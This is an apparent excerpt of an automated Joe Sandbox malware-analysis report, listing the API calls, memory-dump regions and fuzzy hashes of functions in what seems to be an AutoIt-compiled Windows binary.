                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: ed6aaf47c158f68802c6436886a332e8abef037070b5825b587f975d754a4821
                                                • Instruction ID: 8276e19e9ca2242a48ce3f69212da9add85e1b62e1f1f8bc8967b575712ca934
                                                • Opcode Fuzzy Hash: ed6aaf47c158f68802c6436886a332e8abef037070b5825b587f975d754a4821
                                                • Instruction Fuzzy Hash: B6412B716042AC9AEB258E68CD84BFEBBE9EB45304F1804EDD5CE87142D2759A45CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 01032C8C
                                                  • Part of subcall function 00FF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF3A97,?,?,00FF2E7F,?,?,?,00000000), ref: 00FF3AC2
                                                  • Part of subcall function 00FF2DA5: GetLongPathNameW.KERNELBASE ref: 00FF2DC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen
                                                • String ID: X
                                                • API String ID: 779396738-3081909835
                                                • Opcode ID: 1bf1e8b33dfd33859a817392b03ed5b0e5e738431e3cb5d609669738a16a9b18
                                                • Instruction ID: 2754caaf23dbdbd529a1f54fd5f66823f5078e3257e48ff6cf5a7d8cc50b269a
                                                • Opcode Fuzzy Hash: 1bf1e8b33dfd33859a817392b03ed5b0e5e738431e3cb5d609669738a16a9b18
                                                • Instruction Fuzzy Hash: D421F371A0024C9FCB41EF94C845BEE7BFCAF89304F008059E544B7245DBB85A899F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID: EA06
                                                • API String ID: 2638373210-3962188686
                                                • Opcode ID: 929dc1baf657e081a06f6731d0a8b48f98445c714d0f864679b34a34f9072349
                                                • Instruction ID: e828ebd9b346c60304958a077f4fd4bbeced0be3a4d9cefd75f296985e5a765d
                                                • Opcode Fuzzy Hash: 929dc1baf657e081a06f6731d0a8b48f98445c714d0f864679b34a34f9072349
                                                • Instruction Fuzzy Hash: CB01B1729042687EDF29C7A9C856EEEBBFC9B15201F00459AE593D6181E5B8E6088B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 7665ee99d596047d0a87483a294abde947de6442cd46e81e2bac05aa20c49465
                                                • Instruction ID: 40fc3112b854fba46664a2c32fcdf3eb00d9e251820283eb816472a4335a7a09
                                                • Opcode Fuzzy Hash: 7665ee99d596047d0a87483a294abde947de6442cd46e81e2bac05aa20c49465
                                                • Instruction Fuzzy Hash: CAE0553178622CB7EB206BA19D11EADBBA0EF58711B0001AAF9C45B204C9790A01E6D6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0102C74F: GetOEMCP.KERNEL32(00000000), ref: 0102C77A
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102CA1D,?,00000000), ref: 0102CBF0
                                                • GetCPInfo.KERNEL32(00000000,0102CA1D,?,?,?,0102CA1D,?,00000000), ref: 0102CC03
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 14dc40df816c7d1a0523b4574fcfdcd78b7c74c6c9d0f71b5e0ec31be55dcfa0
                                                • Instruction ID: 024a2d27fe2a58f384ac493d119914d1d9f6d165a217966123ee266261ec32f0
                                                • Opcode Fuzzy Hash: 14dc40df816c7d1a0523b4574fcfdcd78b7c74c6c9d0f71b5e0ec31be55dcfa0
                                                • Instruction Fuzzy Hash: 4C51557090426A9FFB219F79CA806FFBFE5EF41200F2480AED0D68B151D73995428B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 01022D74: GetLastError.KERNEL32(?,?,01025686,01033CD6,?,00000000,?,01025B6A,?,?,?,?,?,0101E6D1,?,010B8A48), ref: 01022D78
                                                  • Part of subcall function 01022D74: _free.LIBCMT ref: 01022DAB
                                                  • Part of subcall function 01022D74: SetLastError.KERNEL32(00000000,?,?,?,?,0101E6D1,?,010B8A48,00000010,00FF4F4A,?,?,00000000,01033CD6), ref: 01022DEC
                                                  • Part of subcall function 01022D74: _abort.LIBCMT ref: 01022DF2
                                                  • Part of subcall function 0102CADA: _abort.LIBCMT ref: 0102CB0C
                                                  • Part of subcall function 0102CADA: _free.LIBCMT ref: 0102CB40
                                                  • Part of subcall function 0102C74F: GetOEMCP.KERNEL32(00000000), ref: 0102C77A
                                                • _free.LIBCMT ref: 0102CA33
                                                • _free.LIBCMT ref: 0102CA69
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: 675a9e98c080ced2f65a9a09d75fe9377e57b1f81464c6565eef74ee86e65a2e
                                                • Instruction ID: bf0c151e3e90926ff088718907cab51a5c095da42f496fb409e797baf9c8dd30
                                                • Opcode Fuzzy Hash: 675a9e98c080ced2f65a9a09d75fe9377e57b1f81464c6565eef74ee86e65a2e
                                                • Instruction Fuzzy Hash: 3F310531900269AFFB21EBACD640BDDBBF4EF44324F2101DAE8849B291EB365D40CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,00FF1129,00000000,00000000,00000000,?,0102328B,00000006,FlsSetValue,01092290,FlsSetValue,00000000,00000364,?,01022E46,00000000), ref: 01023037
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 01023044
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: b6756dd221c77127686762210903f66775f5d2a52c5caf3b659a2ccbb2803c30
                                                • Instruction ID: 89dcc32f103f2d428958af00a940053ba87c789e225dc87b06a46301b5b5adc8
                                                • Opcode Fuzzy Hash: b6756dd221c77127686762210903f66775f5d2a52c5caf3b659a2ccbb2803c30
                                                • Instruction Fuzzy Hash: 7C11C833A001319BAB359D5DD9E059A7795BB897607060150FE95AF148D73DEC0187F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 001911A6
                                                  • Part of subcall function 001908E0: GetFileAttributesW.KERNELBASE(?), ref: 001908EB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: AttributesFileFolderPath
                                                • String ID:
                                                • API String ID: 1512852658-0
                                                • Opcode ID: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
                                                • Instruction ID: 8d4e2a082f5d3d7449b1614502b2f29b1ec58a767640e11abdb7e4812f1b4301
                                                • Opcode Fuzzy Hash: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
                                                • Instruction Fuzzy Hash: E1517531A1120DA6DF14FFA0C955BEF7379EF58700F0045A9A609E7280EB79AB44CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00FF4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4E9C
                                                  • Part of subcall function 00FF4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00FF4EDD,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EAE
                                                  • Part of subcall function 00FF4E90: FreeLibrary.KERNEL32(00000000,?,?,00FF4EDD,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EC0
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EFD
                                                  • Part of subcall function 00FF4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4E62
                                                  • Part of subcall function 00FF4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,01033CDE,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4E74
                                                  • Part of subcall function 00FF4E59: FreeLibrary.KERNEL32(00000000,?,?,01033CDE,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4E87
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressFreeProc
                                                • String ID:
                                                • API String ID: 2632591731-0
                                                • Opcode ID: 9702e2f09c4082b0ea81bed70219a50a664e35a1a9b32f2dedf1e5913228c13f
                                                • Instruction ID: fef19d85738fc26dd6f4215c37db0c6eeaf1b29c5af6cd82cca5eba913a30088
                                                • Opcode Fuzzy Hash: 9702e2f09c4082b0ea81bed70219a50a664e35a1a9b32f2dedf1e5913228c13f
                                                • Instruction Fuzzy Hash: 6D112732610209ABDB10BF64DC02FFE77A4AF40B10F10442DF686BB1E1EE78AA05A750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: __wsopen_s
                                                • String ID:
                                                • API String ID: 3347428461-0
                                                • Opcode ID: df51470f74167a6c4be85fa2b5154c2b6db39b4d51fa168ffa11dbf4ba6cc3bb
                                                • Instruction ID: fe1b4c474d9b2a8c237899c8e981c701cc36e43bad9b12ad41b6e525c88f60ed
                                                • Opcode Fuzzy Hash: df51470f74167a6c4be85fa2b5154c2b6db39b4d51fa168ffa11dbf4ba6cc3bb
                                                • Instruction Fuzzy Hash: 7311187590410AAFCB15DF58E9409DE7BF9EF48314F14809AFC48AB311D631DA21CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: __alldvrm
                                                • String ID:
                                                • API String ID: 65215352-0
                                                • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                • Instruction ID: 4f153107e3d7fc08becbed60590de83d784dd83f7c38d7678aaebbbe621ecf79
                                                • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                • Instruction Fuzzy Hash: AC01D871950309AFEB25DFE4CC45BEDB7ECEB44224F1185ADE88697100DA39990087A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction ID: 1a9827c00b5b9b5e36b4e83a8fa194cde909bcc505cfe37c3a297fcb67258728
                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction Fuzzy Hash: 28F02836510A269AD7333AA9DC08BDE37D99F5A2B4F000F56EDE1931D4CB7CE40186A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,00FF1129,00000000,?,01022E29,00000001,00000364,?,?,?,0101F2DE,01023863,010C1444,?,0100FDF5,?), ref: 01024CBE
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 2e9af3ce7d57740cd8bdeeb987c74a88f31bdc9cf17909b0bb9cd35700f3a52d
                                                • Instruction ID: 837d3083c9b8a40c30314c27fafbf64844cf4b1a0624784d0c1c03e05083cd08
                                                • Opcode Fuzzy Hash: 2e9af3ce7d57740cd8bdeeb987c74a88f31bdc9cf17909b0bb9cd35700f3a52d
                                                • Instruction Fuzzy Hash: B0F0E93160423DA7EBE15F6ED808B9A3BC8EF517B0B344166E9D9E7288CB75D40186E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4F6D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: c25341389a3f0eedcd805c8683f202488982b7c573a9f13f67fa6b12f28ab885
                                                • Instruction ID: 978750bc670099b814fcdc375c72333c7abef7f1e698ce8b0d672f3dc6b079c9
                                                • Opcode Fuzzy Hash: c25341389a3f0eedcd805c8683f202488982b7c573a9f13f67fa6b12f28ab885
                                                • Instruction Fuzzy Hash: 4CF03071505756CFDB349F64D490967BBF4AF14729310897EE2EE83560C731A844EF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLongPathNameW.KERNELBASE ref: 00FF2DC4
                                                  • Part of subcall function 00FF6B57: _wcslen.LIBCMT ref: 00FF6B6A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: LongNamePath_wcslen
                                                • String ID:
                                                • API String ID: 541455249-0
                                                • Opcode ID: d4f7e757683f6610e1dec4a65d5c8c28bedaa6511df80d6df5c86739f66b929d
                                                • Instruction ID: 99e495a7562ee1ab65ab6dc75ea2ad6422e53de6a8ae2569c7a77b735d811259
                                                • Opcode Fuzzy Hash: d4f7e757683f6610e1dec4a65d5c8c28bedaa6511df80d6df5c86739f66b929d
                                                • Instruction Fuzzy Hash: F0E0C272A042285BCB20A2989C05FEA77EDDFC8790F0400B1FE49E724CDA74AD8086A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction ID: 39dc5d2215de47465198fba1d0431ca5d322c9b0a3ce8f54e509c075237d0782
                                                • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction Fuzzy Hash: C5E04FB0609B005FDF395A2CA8517F677E89F49300F10086EFADF93252E57268458B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00FF3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF3908
                                                  • Part of subcall function 00FFD730: GetInputState.USER32 ref: 00FFD807
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2B6B
                                                  • Part of subcall function 00FF30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FF314E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                • String ID:
                                                • API String ID: 3667716007-0
                                                • Opcode ID: f7657b68e522510b7305a33d1ea771b0204125175907dcb3041e06b31d83164d
                                                • Instruction ID: abebe57a217dc77f3e54146bc607fad8e3ea607e357b9fbda5f0cbc2fa9a2af6
                                                • Opcode Fuzzy Hash: f7657b68e522510b7305a33d1ea771b0204125175907dcb3041e06b31d83164d
                                                • Instruction Fuzzy Hash: 6BE0DF3260820C06CA04BB3098125BDB3599FD1252F40143EF38242173CE2D8645A311
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?), ref: 001908EB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                • Instruction ID: b56048b1f4f79ce6928199f546885e1a99655e60a01f4491d38ff82d841d5c7c
                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                • Instruction Fuzzy Hash: BFE08C71A0520CEFEF25CBB88808AA977B8DB08320F104658E91AC3281D6308E40A694
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?), ref: 001908BB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                • Instruction ID: 26a6f1c3c698ae263438eba95d7c69ba28fd61c4b9687349bb249a44303876a7
                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                • Instruction Fuzzy Hash: 03D05E30E0620CABCB10CAA49804A9A73A89B08320F108754E91593280D63199409790
                                                Uniqueness

